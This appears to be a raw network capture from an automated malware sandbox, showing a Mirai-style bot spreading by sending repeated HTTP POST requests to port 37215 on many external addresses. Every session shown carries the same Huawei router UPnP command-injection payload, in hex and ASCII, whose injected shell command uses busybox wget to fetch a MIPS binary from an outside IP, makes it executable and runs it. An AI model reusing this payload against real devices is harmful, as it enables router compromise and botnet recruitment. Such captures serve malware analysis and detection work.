                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    51192.168.2.2346368197.41.187.19737215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802079916 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    52192.168.2.2356880197.163.246.24337215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802203894 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    53192.168.2.2342846156.158.172.24337215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802306890 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    54192.168.2.234834041.182.228.10637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802365065 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    55192.168.2.2335196156.30.14.11037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802443981 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    56192.168.2.234396241.128.193.6937215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802527905 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    57192.168.2.235094641.237.37.21637215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802596092 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    58192.168.2.2349474156.114.247.12837215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802690983 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    59192.168.2.235970041.9.223.14837215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802762985 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    60192.168.2.2339254197.122.183.13037215
                                                    TimestampBytes transferredDirectionData
                                                    Dec 3, 2024 23:01:52.802834988 CET869OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Content-Length: 430
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
